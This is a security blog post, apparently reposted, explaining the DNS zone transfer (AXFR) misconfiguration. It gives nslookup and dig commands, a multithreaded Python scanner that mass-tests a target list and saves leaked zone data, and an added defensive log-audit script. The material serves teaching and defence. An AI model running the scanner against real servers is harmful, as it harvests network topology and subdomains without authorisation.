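  • DNS Zone Transfer Vulnerability

    Preface

    DNS servers are divided into primary servers, backup (secondary) servers and caching servers.
    A zone transfer is when a backup server copies data from the primary server and uses the data it receives to update its own database.
    Synchronizing the database between the primary and backup servers requires a "DNS zone transfer".
    Impact: when a server answers zone transfer requests from any client rather than only from its backup servers, the vulnerability can be used to learn the network topology and obtain every subdomain record.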

    nslookup

    Run nslookup to enter interactive mode
    server ns.test.edu.cn    (set the DNS server)
    ls test.edu.cn    (list the records of the domain)

    dig

    dig @ns1.test.edu.cn axfr test.edu.cn

    EXP

    nslookup + dig, in batch

    # encoding=gbk
    # From my[at]lijiejie.com http://www.lijiejie.com
    
    import threading
    import os
    import re
    
    urls = []
    
    fobj = open('target_list.txt')
    for eachline in fobj.readlines():
        urls.append(eachline)
    
    lock = threading.Lock()
    c_index = 0
    
    def test_DNS_Servers():
        global c_index
        while True:
            lock.acquire()
            if c_index >= len(urls):
                lock.release()
                break    # End of list
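            # strip the trailing newline, then drop a leading "www."
            # (lstrip('www.') strips characters, not the prefix)
            domain = urls[c_index].strip()
            if domain.startswith('www.'): domain = domain[4:]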
            print "---testing:" + domain
            
            c_index += 1
            lock.release()
            cmd_res = os.popen('nslookup -type=ns ' + domain).read()    # fetch DNS Server List
            dns_servers = re.findall(r'nameserver = ([\w.]+)', cmd_res)
            for server in dns_servers:
                if len(server) < 5: server += domain
                cmd_res = os.popen(os.getcwd() + '\\BIND9\\dig @%s axfr %s' % (server, domain)).read()
                if cmd_res.find('Transfer failed.') < 0 and \
                   cmd_res.find('connection timed out') < 0 and \
                   cmd_res.find('XFR size') > 0 :
                    lock.acquire()
                    print '*' * 10 +  ' Vulnerable dns server found:', server, '*' * 10
                    lock.release()
                    with open('vulnerable_hosts.txt', 'a') as f:
                        f.write('%s    %s\n' % (server.ljust(30), domain))
                    with open('dns\\' + server + '.txt', 'w') as f:
                        f.write(cmd_res)
                         
    threads = []
    for i in range(10):
        t = threading.Thread(target=test_DNS_Servers)
        t.start()
        threads.append(t)
    
    for t in threads:
        t.join()
    
    print 'All Done!'
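
On the server side, the same exposure shows up in the name server's own transfer log. The following is an added example, not code from the original post: it scans log text for zone transfers that were served to, or refused for, any client that is not a known backup server. The log line format (modelled on BIND 9 `xfer-out` and `security` messages), the `SECONDARIES` list and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumption: addresses of the legitimate backup (secondary) servers.
SECONDARIES = [ipaddress.ip_network("192.0.2.53/32")]

# Assumed BIND 9 style messages: a transfer that was served, and one that was refused.
STARTED = re.compile(r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+.*"
                     r"transfer of '(?P<zone>[^/']+)/IN': AXFR started")
DENIED = re.compile(r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+.*"
                    r"zone transfer '(?P<zone>[^/']+)/AXFR/IN' denied")

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
15-May-2021 10:00:01.120 xfer-out: info: client @0x7f1c 192.0.2.53#40112 (test.edu.cn): transfer of 'test.edu.cn/IN': AXFR started (serial 2021051501)
15-May-2021 10:07:44.903 xfer-out: info: client @0x7f2d 203.0.113.7#51820 (test.edu.cn): transfer of 'test.edu.cn/IN': AXFR started (serial 2021051501)
15-May-2021 10:09:12.310 security: error: client @0x7f3e 198.51.100.9#33001 (test.edu.cn): zone transfer 'test.edu.cn/AXFR/IN' denied
15-May-2021 10:09:13.000 queries: info: client @0x7f4f 198.51.100.9#33002 (www.test.edu.cn): query: www.test.edu.cn IN A +
"""

def is_secondary(ip):
    """True if the client address belongs to a known backup server."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SECONDARIES)

def audit(log_text):
    """Return (exposed, refused) lists of (client_ip, zone) for non-secondary clients."""
    exposed, refused = [], []
    for line in log_text.splitlines():
        m = STARTED.search(line)
        if m and not is_secondary(m["ip"]):
            exposed.append((m["ip"], m["zone"]))   # zone data left the server
            continue
        m = DENIED.search(line)
        if m and not is_secondary(m["ip"]):
            refused.append((m["ip"], m["zone"]))   # ACL held, but someone asked
    return exposed, refused

if __name__ == "__main__":
    exposed, refused = audit(SAMPLE_LOG)
    for ip, zone in exposed:
        print("EXPOSED: %s was served a transfer of %s" % (ip, zone))
    for ip, zone in refused:
        print("refused: %s requested a transfer of %s" % (ip, zone))
```

Any entry in the first list means the server handed the full zone to a host outside the backup set, which is the condition the tests above look for from the outside.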
    
  • Original article: https://www.cnblogs.com/BOHB-yunying/p/14780667.html